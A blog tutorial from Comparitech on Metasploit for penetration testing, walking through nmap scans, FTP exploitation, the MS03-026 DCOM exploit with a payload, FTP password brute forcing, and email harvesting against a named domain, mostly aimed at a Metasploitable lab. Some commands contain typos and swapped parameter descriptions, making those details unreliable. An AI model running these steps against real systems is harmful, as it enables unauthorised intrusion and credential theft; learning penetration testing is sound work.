By Tim Keary, Copywriter, Comparitech
How do you know if your network is safe? Cybercrime is an everyday threat to companies. There is one hacking attack every 39 seconds. Some have turned to antivirus solutions or vulnerability scanners to stay protected, but these tools aren’t enough. Now, you need penetration testing, as well.
Penetration testing enables you to step into the shoes of an attacker and test your network for vulnerabilities. By getting there first, you can fix the issue before an attacker exploits it. Metasploit is one of the top penetration testing tools for simulating attacks. Here are 10 top tips for using Metasploit to harden your network:
- Run a discovery scan
Many hackers will go on a reconnaissance effort to gather information on the target before launching an attack. They collect on the devices you’re using, including the type of operating system. The information gathered is then used later on to find vulnerabilities to break into the network.
Metasploit can be used to run a discovery scan, a combination of a ping scan, port scan, OS/version detection, and a data import. After completing a scan, you will have a list of IPs with information on the services running on the machine.
You can run a Discovery Scan in Metasploit through the command prompt (which uses NMAP commands!). In this example, we’re going to scan a metasploitable machine. A metasploitable device is a virtual machine with lots of vulnerabilities.
To run a Discovery Scan, follow the instructions below:
To begin, start the metasploitable machine you want to attack and a Windows Server 2003 machine in metasploitable. Enter the following command (with the machine IP): net addr: IP 192.168.1.101
Next, start Metasploit. Enter the following command to scan in the specific IP range (in this example we’re using Kali Linux): msf > nmap -sn 192.168.1.0/24
To find the OS of one of the systems listed enter the following command with the IP address you want to attack: Nmap -sV-O -T4 192.168.1.101
At the bottom of the output, you will be able to see the OS the machine is running.
- Use the Help command to find a list of commands
Knowing what commands you have at your disposal is advantageous when using Metasploit. While you can look online for tutorials to learn new commands, you can also use the Help command to view a list in the Terminal. To view a list of commands, enter the following command:
msf > help
The screen will then show a list of commands with a description. Basic commands like search, use, back help, info, and exit will help you to make your way around. Once you become more familiar with Metasploit, you can start experimenting with more advanced commands and running payloads!
- Run a vulnerability scan
When trying to break into a network, an attacker is looking for a specific vulnerability to exploit. A vulnerability is an entire point that enables an attacker to gain access to a network without authorization. Running a vulnerability scan will highlight these vulnerabilities before an attacker finds them so you can remedy the issue.
You can run vulnerability scans with Metasploit. The commercial version of Metasploit uses Nexpose to run a scan.
First, you need to add then Nexpose console to the Metasploit user interface. You can do this by going to Administration > Global Settings > Expose Consoles > Configure a Nexpose Console
Next, enter the IP of the server, port number, user name, and password. Press Enable.
Click Nexpose and add the IP address of the network or host you want to scan.
Select a Scan template to start the scan
Go to Analysis > Host to view the scan results.
- Import data from a vulnerability scanner
If you’re using Metasploit, then the chances are you will be using other cybersecurity tools like vulnerability scanners. Metasploit allows you to import scan data from other vulnerability scanning tools for you to examine entry points.
You can import scan data from third-party vulnerability scanners like Nessus, Core, and Impact. These tools show you the weaknesses in your defenses that attackers will try to exploit.
To import data:
Complete a scan in NMAP
Save the scan results in XML format on your desktop
Open Metasploit and enter the following command: msf > db_import “path of xml file”
After completing the import, the prompt will generate a Successfully imported message
- Use task chains to schedule scans!
In Metasploit Pro (the paid version of Metasploit), there is a feature called Task Chains that allows you to schedule tasks and complete them automatically. You can use this feature to automatically run scans so that you don’t have to do it manually.
Available tasks include; SCAN, IMPORT, MEXPOSE, BRUTEFORCE, EXPLOIT, MODULE RUN, COLLECT EVIDENCE, CLEANUP, REPORT, and WEB SCAN. To schedule a scan, do the following:
Go to Tasks > Chains > New Task Chain.
Enter a Task Chain Name for the task
Click the + icon under Task Chain Name
Select SCAN from the list of task types
When the task configuration bullet points come up, click on the Schedule Now button
When the schedule table comes up select how often you want to run the task (Once, Hourly, Daily, Weekly, Monthly)
Click the Save button to save the task
- Validate vulnerabilities
Whenever you complete a vulnerability scan, you will have discovered the entry points an attacker could exploit. If there are a lot of vulnerabilities, it can be difficult and time-consuming to go through the list and solve each problem one-by-one. To help make things easier, Metasploit provides a feature called Vulnerability Validation Wizard.
The Vulnerability Validation Wizard ranks vulnerabilities in a list based on their risk to your network. Here you can prioritize your response and deal with the greatest risks first.
To use the Vulnerability Validation Wizard follow the instructions:
Open Metasploit Pro Web Console > Project > Vulnerability Validation
When the vulnerability validation page comes up, enter a Project Name and a Description of the project. Press Start
Click on Pull from Nexpose and check the Import existing Nexpose vulnerability data option
Click the Tag tab and check the Automatically Tag by OS option
Click the Exploit tab, check the Clean up sessions when done option under Sessions
Click on the Generate Report tab, select the format you want to use for your report, and the sections you want to use.
Once the Validation Wizard comes up, press the Push Validations button at the top right of the page
You can view the results of the tested vulnerabilities by going clicking on Home > Project Name > Vulnerabilities. Exploited vulnerabilities will be marked Exploited.
- Use exploits to break into a device
After scoping out vulnerabilities and validating them, you are ready to break into a device. To gain access to a device, you can use an exploit, a script designed for compromising a machine. In this example, we’re going to try and exploit FTP:
To begin, enter the following command: msf > use “exploit path”
Enter the show options command to display the parameters you need to configure to run the exploit: msf > show options. RHOST and RPORT will be listed as required. RHOST is the target IP, and RPORT is the target port.
To run the exploit, you will have to set a target IP address and port. Enter the following command:
msf > set RHOST 192.168.1.101
msf > set RPORT 21
Use the run command: msf > run
If a new session starts, then you will have gained access to the system.
- Use payloads to interact with the compromised system
Payload is another word for a script that an attacker uses to interact with a compromised system. Attackers will use a payload to upload and execute malicious files onto the victim’s system. There are many different kinds of payloads, and the kind you use depends on the type of vulnerability you intend to exploit.
Attackers will use a payload that matches an exploit they found during an earlier vulnerability can. For example, if an attacker detects that you’re running a Windows Server 2003 machine, then they could use the DCOM MS03-026 vulnerability to attack you.
To use a payload, follow the instructions below:
Run a search command to look for an exploit or module that is effective at exploiting this vulnerability (in this example, we search for the DCOM vulnerability). Use the exploit with the best rank: msf > search dcom
Now search for a list of available payloads with the following command: msf exploit (ms03_026_dcom) > show payloads
You will see a list of Compatible Payloads ranked. You want to choose on that allows you to Upload / Execute files or one marked VNC Server (the latter lets you inject a VNC server remotely). Set the payload you want to use: set PAYLOAD payloads /path
Now Set the LHOST (attacker IP), LPORT (attackers port), RPORT (victim IP), and RHOST (victim port). It should look something like this:
msf exploit (ms03_026_dcom) > set LHOST 192.168.1.101
msf exploit (ms03_026_dcom) > set LPORT 23524
msf exploit (ms03_026_dcom)>set RPORT 135
msf exploit (ms03_026_dcom)>set RHOAST 192.168.1.102
Enter the following command to start a new session: msf exploit (ms03_026_dcom) > exploit You can now interact with the machine through the payload’s settings.
- Launch a brute force attack
If an attacker has time to hack into your network, then they might try a brute force attack. In a brute force attack, a hacker tries all possible combinations of characters to gain access to a system and its login credentials. You can use Metasploit to simulate a brute force attack.
With Metasploit, you can launch brute force attacks against the metasploitable device in a range of ways, including through FTP, Telnet, and SSH. The medium you use depends on the type of service the system is running. In this section, we’re going to use FTP to attack the metasploitable device.
Create an auxiliary (small script) dictionary list at the root of your Kali machine to break into the metasploitable device.
In this example we will use the auxiliary/scanner/ftp/ftp_login auxiliary to launch the attack: msf > use auxiliary/scanner/ftp/ftp_login
Now set the path of the file that includes the dictionary by entering the following command: msf auxiliary(ftp_login) > set PASS_FILE /root/pass.txt
Then select the target IP : msf auxiliary(ftp_login) > set RHOST 192.168.1.101
Now enter the run command: msf auxiliary(ftp_login) > run. If the attack has been successful, a session will launch. If it isn’t, you will have failed to access the login credentials.
- How to Obtain Email Account Information
Another risk factor that companies have to mitigate is the theft of account data. Cybercriminals are always on the lookout for email accounts to target and gain access to a network before launching an attack. You can use Metasploit to obtain email account information just like an attacker would.
We can collect emails with the search_email collector module:
Load the module by entering the following command: msf > use auxiliary/gather/search_email_collector
Now use the show options command to view the module options: msf > show options
Set a domain to collect data on: msd > set DOMAIN <microsoft.com> (Note that Google, Bing, and Yahoo email accounts will be searched for by default). You will then see a list of email addresses that have been “located.”
Test Your Defenses Before Cyber Criminals Do!
Putting your network under pressure with a penetration testing tool like Metasploit enables you to discover new ways to improve your defenses. Periodically addressing vulnerabilities will help to minimize your exposure and keep your network available.
Don’t be afraid to hack into the Metasploitable machine to develop your skills. Just remember that once you’re ready to try live devices, you need to obtain written permission from the owner first!
About the Author
Our company website https://www.comparitech.com/